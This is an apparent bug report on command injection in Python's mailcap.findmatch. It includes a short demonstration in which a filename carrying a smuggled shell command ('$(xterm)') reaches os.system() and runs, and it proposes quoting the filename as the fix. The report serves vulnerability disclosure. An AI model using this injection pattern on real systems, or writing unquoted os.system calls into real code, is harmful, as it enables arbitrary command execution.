if the filename contains Shell Commands they will be executed if they
are passed to os.system() as discribed in the docs.
Filename should be quoted with quote(filename) to fix the bug.
https://docs.python.org/2/library/mailcap.html
"mailcap.findmatch(/caps/, /MIMEtype/[, /key/[, /filename/[, /plist/]]])
Return a 2-tuple; the first element is a string containing the
command line to be executed
(which can be passed to*os.system() *),
......"
Exploid Demo wich runs xterm but should not :
=============================
import mailcap
d=mailcap.getcaps()
commandline,MIMEtype=mailcap.findmatch(d, "text/*", filename="'$(xterm);#.txt")
## commandline = "less ''$(xterm);#.txt'"
import os
os.system(commandline)
## xterm starts
=============================
By the way ... please do not use os.system() in your code, makes it unsafe.
Best regards
Bernd Dietzel
Germany